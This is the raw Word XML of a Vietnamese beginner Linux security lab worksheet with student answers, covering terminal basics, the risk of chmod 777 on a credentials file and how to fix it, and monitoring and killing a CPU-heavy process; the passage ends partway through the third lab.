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C81EC" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Linux + Security LAB - Hướng Dẫn Chi Tiết</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2105D0" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t>Tài liệu này hướng dẫn từng bước thực hành LAB Linux + Security cho người mới. Mỗi LAB gồm mục tiêu, cách dựng, command cần chạy, kết quả mong đợi và phần tự phân tích.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E8D68D" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>LAB 1 - Làm Quen Terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7BBED5" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t>Mục tiêu:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Biết dùng terminal Linux cơ bản</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C190EB9" w14:textId="50628F35" w:rsidR="00A41BCD" w:rsidRDefault="00A41BCD">
      <w:r w:rsidRPr="00A41BCD">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="701CC702" wp14:editId="3AB6FB4B">
            <wp:extent cx="5486400" cy="845820"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="59108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84511" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="845820"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F54C287" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t>Các bước thực hiện:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B78404" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Bước 1: Mở terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58507886" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t>Ctrl + Alt + T</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222C9C2D" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Bước 2: Kiểm tra thư mục hiện tại</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2470289D" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t>pwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD2E6B3" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Bước 3: Xem file/thư mục</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE94ECD" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t xml:space="preserve">ls </w:t>
      </w:r>
      <w:r w:rsidR="00A31589">
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:t>lah</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7780C5FE" w14:textId="77777777" w:rsidR="00A31589" w:rsidRDefault="00A31589">
      <w:r w:rsidRPr="00A31589">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30AD5BC9" wp14:editId="0B59F3D1">
            <wp:extent cx="5486400" cy="3696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3696970"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="223891F8" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Bước 4: Tạo thư mục lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4491C3" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t>mkdir linux_lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3498C84C" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Bước 5: Đi vào thư mục</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6448D929" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t>cd linux_lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BFD3A8" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Bước 6: Tạo file test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F27C519" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t>touch test.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C12D98" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Bước 7: Kiểm tra lại</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FEEE12" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t xml:space="preserve">ls </w:t>
      </w:r>
      <w:r w:rsidR="00A31589">
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:t>lah</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FFF7D1" w14:textId="77777777" w:rsidR="00A31589" w:rsidRDefault="00A31589">
      <w:r w:rsidRPr="00A31589">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08042B34" wp14:editId="6DC18DC9">
            <wp:extent cx="4791744" cy="10860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91744" cy="1086002"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D2C725" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t>Kết quả mong đợi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212EB574" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Thấy thư mục linux_lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F3F9E9" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Thấy file test.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C72029" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Hiểu pwd và cd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4329876E" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t>Phân tích sau LAB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3D6C31" w14:textId="77777777" w:rsidR="006825B4" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t>- Command nào quan trọng nhất?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6C567C" w14:textId="77777777" w:rsidR="006825B4" w:rsidRDefault="006825B4">
      <w:r>
        <w:t>Câu lệnh chú ý nhất là ls –lah, nó kiểm tra các thao tác còn lại đã hoàn thành chưa đồng thời  có cái nhìn toàn cảnh về hệ thống mắt thường không thể thấy</w:t>
      </w:r>
      <w:r w:rsidR="00711FBD">
        <w:br/>
        <w:t>- Output nào cần chú ý?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3EC636" w14:textId="77777777" w:rsidR="006825B4" w:rsidRDefault="006825B4">
      <w:r>
        <w:t xml:space="preserve">Output cần chú ý là chuỗi phân quyền và chủ sở hữu.  </w:t>
      </w:r>
      <w:r w:rsidR="00711FBD">
        <w:br/>
        <w:t>- Có rủi ro bảo mật nào?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C46E67F" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00072C86">
      <w:r>
        <w:t>Khi tạo file hoặc thư mục, hệ thống tự động gán một bộ quyền dựa trên thông số umask. Nếu cấu hình umask lỏng lẻo, file test.txt mới tạo vô tình cấp quyền đọc/ghi cho những người dung khác từ đó thực hiện chèn shellcode hoặc mã độc…</w:t>
      </w:r>
      <w:r w:rsidR="00711FBD">
        <w:br/>
        <w:t>- Nếu là hệ thống thật thì cần xử lý gì thêm?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47059105" w14:textId="77777777" w:rsidR="00072C86" w:rsidRDefault="00072C86">
      <w:r>
        <w:t>+ Thiết lập đặc quyền tối thiểu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B994276" w14:textId="77777777" w:rsidR="00072C86" w:rsidRDefault="00072C86">
      <w:r>
        <w:t>+ Giám sát tính toàn vẹn của tệp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019773F3" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>LAB 2 - Permission Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A47E4E8" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t>Mục tiêu:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Hiểu permission và risk chmod 777</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34ECD792" w14:textId="561C2B49" w:rsidR="00DA4D14" w:rsidRDefault="00DA4D14">
      <w:r w:rsidRPr="00DA4D14">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11B56910" wp14:editId="40E36D72">
            <wp:extent cx="5486400" cy="1758950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="169898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8278" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="1758950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="23255188" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t>Các bước thực hiện:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B584B1" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Bước 1: Tạo file chứa credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B057EC" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t>echo 'admin:123456' &gt; creds.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F29E42E" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Bước 2: Kiểm tra permission</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1523A4D6" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t>ls -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13775D58" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Bước 3: Set permission nguy hiểm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6544A3E7" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t>chmod 777 creds.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1550B1D5" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Bước 4: Kiểm tra lại</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C2F4D8" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t>ls -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7937F2B5" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Bước 5: Fix permission</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72670DB3" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t>chmod 600 creds.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76858748" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Bước 6: Kiểm tra lần cuối</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA3CDB6" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t>ls -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5617C95C" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t>Kết quả mong đợi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6994AD34" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Thấy permission thay đổi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C59B7B" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Hiểu rwx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EA6D43" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Hiểu risk chmod 777</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366E8A4B" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t>Phân tích sau LAB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BC28C0" w14:textId="77777777" w:rsidR="00BE564F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t>- Command nào quan trọng nhất?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52742EDB" w14:textId="77777777" w:rsidR="00BE564F" w:rsidRDefault="00BE564F">
      <w:r>
        <w:t>Chmod là quan trọng nhất vì nó trực tiếp thay đổi quyền của tệp tin. Tiếp theo ls –l xác minh xem quyền đã diễn ra đúng ý chưa.</w:t>
      </w:r>
      <w:r w:rsidR="00711FBD">
        <w:br/>
        <w:t>- Output nào cần chú ý?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3670FB" w14:textId="77777777" w:rsidR="00BE564F" w:rsidRDefault="00BE564F">
      <w:r>
        <w:t>Chuỗi ký tự phân quyền</w:t>
      </w:r>
      <w:r w:rsidR="00711FBD">
        <w:br/>
        <w:t>- Có rủi ro bảo mật nào?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19993CD4" w14:textId="77777777" w:rsidR="00BE564F" w:rsidRDefault="00BE564F">
      <w:r>
        <w:t>Chmod 777 cực kỳ nghiêm trọng vì  cho phép tất cả mọi người có thể đọc, ghi và thực thi tệp nhạy cảm như creds.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BF5D38" w14:textId="77777777" w:rsidR="00BE564F" w:rsidRDefault="00BE564F">
      <w:r>
        <w:t>+ Lộ thông tin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1667FCC5" w14:textId="77777777" w:rsidR="00BE564F" w:rsidRDefault="00BE564F">
      <w:r>
        <w:t>+ Sửa đổi trái phép</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E58D9B9" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00BE564F">
      <w:r>
        <w:t>+ Leo thang đặc quyền</w:t>
      </w:r>
      <w:r w:rsidR="00711FBD">
        <w:br/>
        <w:t>- Nếu là hệ thống thật thì cần xử lý gì thêm?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A564FA" w14:textId="77777777" w:rsidR="00BE564F" w:rsidRDefault="00BE564F">
      <w:r>
        <w:t>+ Không lưu plain text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611F8B55" w14:textId="77777777" w:rsidR="00BE564F" w:rsidRDefault="00BE564F">
      <w:r>
        <w:t>+ Áp dụng nguyên tắc đặuc quyền tối thiểu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123124C8" w14:textId="77777777" w:rsidR="00BE564F" w:rsidRDefault="00BE564F">
      <w:r>
        <w:t>+ Kiểm tra Owner/Group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025CCB86" w14:textId="77777777" w:rsidR="00BE564F" w:rsidRDefault="00BE564F">
      <w:r>
        <w:t>+ Giám sát</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF8965E" w14:textId="77777777" w:rsidR="00072C86" w:rsidRDefault="00072C86">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00072C86">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C638816" wp14:editId="7D02DC03">
            <wp:extent cx="5039428" cy="28578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9428" cy="2857899"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AD60F4" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>LAB 3 - Process Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416D4217" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t>Mục tiêu:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Theo dõi process và CPU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF25222" w14:textId="1645BB1B" w:rsidR="00DA4D14" w:rsidRDefault="00DA4D14">
      <w:r w:rsidRPr="00DA4D14">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C27B196" wp14:editId="32476A79">
            <wp:extent cx="5486400" cy="2074545"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="150425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51447" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="2074545"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="178D30D8" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t>Các bước thực hiện:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9782B2" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Bước 1: Tạo process ăn CPU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357DB14B" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t>yes &gt; /dev/null &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320760CA" w14:textId="77777777" w:rsidR="00984D42" w:rsidRDefault="00984D42">
      <w:r w:rsidRPr="00984D42">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55FBD212" wp14:editId="5842A4CF">
            <wp:extent cx="3677163" cy="438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7163" cy="438211"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6018F75A" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Bước 2: Kiểm tra CPU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D62CF5" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00984D42">
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00711FBD">
        <w:t>op</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B87971D" w14:textId="77777777" w:rsidR="00984D42" w:rsidRDefault="00984D42">
      <w:r w:rsidRPr="00984D42">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="763D9D69" wp14:editId="11E28832">
            <wp:extent cx="5486400" cy="28727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872740"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBCDA6C" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Bước 3: Tìm process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4714457D" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t>ps aux --sort=-%cpu | head</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBAA7BF" w14:textId="77777777" w:rsidR="00984D42" w:rsidRDefault="00984D42">
      <w:r w:rsidRPr="00984D42">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="748ADB02" wp14:editId="103FDE9C">
            <wp:extent cx="5486400" cy="611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611505"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C23455" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Bước 4: Lấy PID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435E9B16" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t>ps aux | grep yes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F707EA6" w14:textId="77777777" w:rsidR="00984D42" w:rsidRDefault="00984D42">
      <w:r w:rsidRPr="00984D42">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6546119F" wp14:editId="154FB0D6">
            <wp:extent cx="5486400" cy="407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407035"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B7701C" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Bước 5: Kill process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D54B8CA" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t>kill -9 PID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4641F653" w14:textId="77777777" w:rsidR="00984D42" w:rsidRDefault="00984D42">
      <w:r w:rsidRPr="00984D42">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77DB357D" wp14:editId="2820BF68">
            <wp:extent cx="5163271" cy="62873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271" cy="628738"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9398EE" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t>Kết quả mong đợi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185EC6F1" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>CPU tăng cao</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0702D55C" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Tìm được process yes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BFDAAE" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Kill thành công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6534F7C9" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t>Phân tích sau LAB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C12CB29" w14:textId="77777777" w:rsidR="006128E9" w:rsidRDefault="00711FBD">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>- Command nào quan trọng nhất?</w:t>
      </w:r>
    </w:p>
